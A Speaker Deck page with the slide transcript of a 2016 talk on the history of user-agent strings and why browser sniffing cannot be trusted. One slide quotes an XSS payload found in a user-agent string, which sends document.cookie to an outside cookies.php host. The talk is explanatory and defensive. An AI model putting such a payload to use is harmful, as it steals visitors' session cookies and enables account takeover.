Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Everybody Lies @ Halfstack

Niels Leenheer
November 18, 2016
Technology
4
230

Everybody Lies @ Halfstack

This is a talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.

Niels Leenheer

November 18, 2016
Tweet

More Decks by Niels Leenheer

See All by Niels Leenheer
Fun with Bluetooth @ Frontend United
nielsleenheer
1
84
Fun with Bluetooth @ Amsterdam JSNation
nielsleenheer
1
110
Fun with Bluetooth @ JSConf Belgium
nielsleenheer
0
68
Fun with Bluetooth @ DevDays Vilnius
nielsleenheer
0
120
Fun with Bluetooth @ Universal JS Day
nielsleenheer
0
320
Fun with Bluetooth @ Amsterdam University of Applied Sciences
nielsleenheer
0
39
Fun with Bluetooth @ FrontendNE 2018
nielsleenheer
0
160
Fun with Bluetooth @ DevFestNL
nielsleenheer
0
130
Fun with Bluetooth @ Halfstack
nielsleenheer
0
82

Other Decks in Technology

See All in Technology
asken リアーキテクチャを行う背景と DDD導入戦略
murahigeas
1
150
KubernetesにおけるSBOMを利用した脆弱性管理/Vulnerability_Management_with_SBOM_in_Kubernetes
takumakume
0
330
2023/09/14 Fin-JAWS #32 「SIEM on Amazon OpenSearch Serviceを1年運用してわかったこと」
junjikoide
1
200
承認コネクタについて
miyakemito
1
130
土壌と植物で奏でるアート~農業における新たなパラダイム~
shinrinakamura
0
160
知らなくていい、知っても役に立たないDNSの豆知識
th0x0472
0
390
Product Ops: Conectando Estratégia e Execução de Produto
rigolon
1
130
Beyond the Baseline: Horizons for Cloud Security Programs
ramimac
0
140
(n=1の)テーブルデータコンペの取り組み方
makotu
1
1.1k
重厚長大な企業の内製開発組織で成果を出すためのサーバーレスアーキテクチャ / ServerlessDays Tokyo 2023
mongolyy
3
290
[PHPカンファレンス沖縄2023]【実践編】良いプロダクト作りのための組織育成 健全なコードは健全な組織、健全なチームから
ikezoemakoto
1
190
Airplay
elcuervo
0
140

Featured

See All Featured
How To Stay Up To Date on Web Technology
chriscoyier
780
250k
Scaling GitHub
holman
455
140k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
152
14k
Raft: Consensus for Rubyists
vanstee
130
5.9k
Optimising Largest Contentful Paint
csswizardry
6
1.8k
Designing the Hi-DPI Web
ddemaree
274
33k
Building Applications with DynamoDB
mza
87
5.2k
The Illustrated Children's Guide to Kubernetes
chrisshort
26
45k
Docker and Python
trallard
31
2.3k
Git: the NoSQL Database
bkeepers
PRO
420
61k
Art Directing for the Web. Five minutes with CSS Template Areas
malarkey
197
11k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
26
5.5k

Transcript

  1. everybody lies
    Niels Leenheer
    halfstack, november 18th 2016
    @html5test

    View Slide

  2. View Slide

  3. View Slide

  4. this talk is full of 

    lies and deception
    warning:

    View Slide

  5. View Slide

  6. View Slide

  7. View Slide

  8. this talk is about
    browser sniffing
    yes…

    View Slide

  9. why?

    View Slide

  10. browser sniffing is 

    dirty

    View Slide

  11. you should use 

    feature detection

    View Slide

  12. View Slide

  13. Dear Web Developers: 

    Browser Sniffing is Stupid
    http:/
    /www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

    View Slide

  14. 5 Reasons Why 

    Browser Sniffing Stinks
    https:/
    /www.sitepoint.com/why-browser-sniffing-stinks/

    View Slide

  15. Browser Detection is Bad
    https:/
    /css-tricks.com/browser-detection-is-bad/

    View Slide

  16. View Slide

  17. feature

    detection
    responsive

    design
    progressive

    enhancement
    best-practices

    View Slide

  18. anti-pattern
    browser sniffing

    View Slide

  19. browser sniffing
    is just a tool

    View Slide

  20. everybody uses 

    browser sniffing

    View Slide

  21. View Slide

  22. is browser sniffing 

    actually?
    what…

    View Slide

  23. the http specification defines
    the user-agent header 


    it contains a string with
    information about the browser

    View Slide

  24. every request the browser
    makes to the server includes
    the user-agent header

    View Slide

  25. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    View Slide

  26. GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    HTTP/1.1 200 OK
    Date: Mon, 08 Feb 2016 10:40:28 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
    ETag: "984-50cae11796432"
    Accept-Ranges: bytes
    Content-Length: 2436
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8



    View Slide

  27. you can access 

    the exact same string 

    using javascript

    View Slide

  28. 
<br/><!--
<br/>
<br/>alert(navigator.userAgent);
<br/>
<br/>//-->
<br/>


    View Slide

  29. you can use the user-agent
    string to identify:


    the browser

    the rendering engine

    the operating system

    the device model

    and more

    View Slide

  30. View Slide

  31. is browser sniffing 

    good for?
    what…

    View Slide

  32. knowledge

    View Slide

  33. if you know the platform or browser, 

    you can streamline the user experience

    View Slide

  34. View Slide

  35. if you know your users, 

    you can build a better site for them

    View Slide

  36. if you know which browser is being 

    used, you can work around bugs

    View Slide

  37. if you know which browser is causing
    errors, you can fix them

    View Slide

  38. privacy implications

    View Slide

  39. View Slide

  40. View Slide

  41. changing your user agent 

    string actually makes it 

    easier to track you

    View Slide

  42. anonymity by looking 

    like everybody else

    View Slide

  43. View Slide

  44. View Slide

  45. is browser sniffing 

    so difficult?
    why…

    View Slide

  46. things started out simple

    View Slide

  47. Mosaic/0.9
    Mosaic

    View Slide

  48. Mozilla/1.0 (Win3.1)
    Netscape Navigator
    code name of 

    the browser

    View Slide

  49. but it quickly started 

    to get complicated

    View Slide

  50. Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
    Internet Explorer
    compatible with 

    Netscape Navigator 1.0

    View Slide

  51. Opera/8.54 (Windows 95; U; en)
    Opera

    View Slide

  52. Opera/10.00 (Windows NT 5.1; U; en) 

    Presto/2.2.0
    Opera

    View Slide

  53. Opera/9.8 (Windows NT 5.1; U; en) 

    Presto/2.2.0 Version/10.00
    Opera
    real version of

    the browser

    View Slide

  54. Mozilla/5.0 

    (Windows; U; Windows NT 6.0; en; rv:1.9.1) 

    Gecko/20090624 Firefox/3.5
    Firefox
    build date of

    the rendering engine

    View Slide

  55. Mozilla/5.0 (Windows NT 6.0; rv:2.0) 

    Gecko/20100101 Firefox/4.0
    Firefox
    build date is no 

    longer updated

    View Slide

  56. Mozilla/5.0 (Windows NT 6.0; rv:16.0) 

    Gecko/16.0 Firefox/16.0
    Firefox

    View Slide

  57. and it gets worse…

    View Slide

  58. Mozilla/5.0 

    (Macintosh; U; PPC Mac OS X 10_4_11; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Version/3.2.3 Safari/525.28.3
    Safari

    View Slide

  59. Mozilla/5.0 

    (Windows; U; Windows NT 6.0; en)

    AppleWebKit/525.27.1 (KHTML, like Gecko)

    Chrome/15.0.874.120 Safari/525.28.3
    Chrome

    View Slide

  60. Mozilla/5.0 

    (Windows NT 10.0; WOW64) 

    AppleWebKit/537.36 (KHTML, like Gecko) 

    Chrome/44.0.2403.155 Safari/537.36 

    OPR/31.0.1889.180
    Opera

    View Slide

  61. Mozilla/5.0 

    (Windows NT 6.3; Trident/7.0; rv:11.0) 

    like Gecko
    Internet Explorer

    View Slide

  62. Mozilla/5.0 (Windows NT 10.0)

    AppleWebKit/537.36 (KHTML, like Gecko)

    Chrome/42.0.2311.135 Safari/525.28.3 

    Edge/12.10162
    Edge

    View Slide

  63. and those were all relatively
    normal user-agent strings

    View Slide

  64. sometimes browsers simply do
    not make sense at all

    View Slide

  65. Mozilla/5.0 (Linux; Android 4.3; en; 

    SAMSUNG GT-I9505 Build/JSS15J) 

    AppleWebKit/537.36 (KHTML, like Gecko) 

    Version/1.5 Chrome/28.0.1500.94 

    Mobile Safari/537.36
    Samsung Internet

    View Slide

  66. Mozilla/5.0 (Series40; NOKIALumia800; 

    Profile/MIDP-2.1 Configuration/CLDC-1.1) 

    Gecko/20100401 S40OviBrowser/1.8.0.50.5
    Nokia Xpress for Windows Phone

    View Slide

  67. sometimes browsers lie to 

    hide their true identity

    View Slide

  68. Opera/9.80 (X11; Linux zbov; U; en) 

    Presto/2.9.201 Version/11.50
    Opera

    View Slide

  69. Opera/9.80 (X11; Linux zbov; U; en) 

    Presto/2.9.201 Version/11.50
    Opera Mobile (desktop mode)
    ROT 13 encrypted

    “mobi“

    View Slide

  70. Mozilla/5.0 (compatible; MSIE 8.0; 

    Windows NT 6.1; Trident/5.0)
    Internet Explorer

    View Slide

  71. Mozilla/5.0 (compatible; MSIE 8.0; 

    Windows NT 6.1; Trident/5.0)
    Internet Explorer (compatibility view)
    Trident 5 means it’s 

    Internet Explorer 9

    View Slide

  72. sometimes browsers 

    are just weird

    View Slide

  73. View Slide

  74. Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
    Mozilla/4.0 (compatible; 

    MSIE 6.0; MSIE 5.5; Windows NT 5.0) 

    Opera 7.02 Bork-edition [en]
    #1
    #2

    View Slide

  75. View Slide

  76. View Slide

  77. BORK BORK BORK

    View Slide

  78. View Slide

  79. View Slide

  80. View Slide

  81. and it is possible to change the
    user-agent string yourself

    View Slide

  82. alert("My Little Pony");
    document.location= 
<br/>"http://www.max1094.18.lc/admin/cookies.php?c=" + 
<br/>document.cookie;
    alt="My Little Pony">
    XSS attacks

    View Slide

  83. XSS attacks

    View Slide


  84. (╯°□°)╯︵ ┻━┻


    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    You’re site is

    funny people

    View Slide

  85. angry people

    View Slide

  86. FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 

    FuckYou/123.0 FuckingFox/321.0


    Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) 

    Presto/2.10.229 Version/11.62


    Seriously, Go fuck yourself


    W3C standards are important. 

    Stop fucking obsessing over user-agent already.
    angry people

    View Slide

  87. 1.000.000

    unique

    useragent
    strings
    82 x fuck
    10 x shit
    6 x ass
    9 x dick
    3 x vagina
    108 x sex
    4 x balls

    View Slide

  88. user-agent strings 

    cannot be trusted!

    View Slide

  89. everybody lies

    View Slide

  90. use browser sniffing for
    controlling access to 

    your website
    you should never

    View Slide

  91. you should never
    use browser sniffing for
    determining browser
    capabilities

    View Slide

  92. you should never
    build your own 

    browser sniffing library


    View Slide

  93. View Slide

  94. use a browser sniffing library that 

    is regularly updated
    #1

    View Slide

  95. check if it is possible
    to automatically schedule updates
    #2

    View Slide

  96. View Slide

  97. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  98. “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”
    — Ghandi

    View Slide

  99. — Adolf Hitler
    “If you tell a big enough lie 

    and tell it frequently enough, 

    it will be believed”

    View Slide

  100. thank you!

    View Slide

  101. thank you!

    View Slide